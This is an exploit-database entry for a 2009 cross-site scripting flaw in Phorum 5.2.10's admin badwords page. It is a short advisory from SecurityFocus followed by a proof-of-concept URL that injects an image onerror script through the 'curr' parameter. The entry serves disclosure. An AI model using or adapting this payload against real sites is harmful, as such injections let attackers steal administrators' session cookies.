Phorum 5.2 - adminbadwords.php?curr Cross-Site Scripting

2009-04-16T00:00:00
ID EXPLOITPACK:2350DD07CDCF0776DB31ECD4583E5947
Type exploitpack
Reporter voodoo-labs
Modified 2009-04-16T00:00:00

Description

Phorum 5.2 - adminbadwords.php?curr Cross-Site Scripting

                                        
                                            source: https://www.securityfocus.com/bid/34551/info

Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.

Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected. 

http://www.example.com/phorum-5.2.10/admin.php?module=badwords&curr=1"><img/src/onerror="
alert('voodoo');&delete=1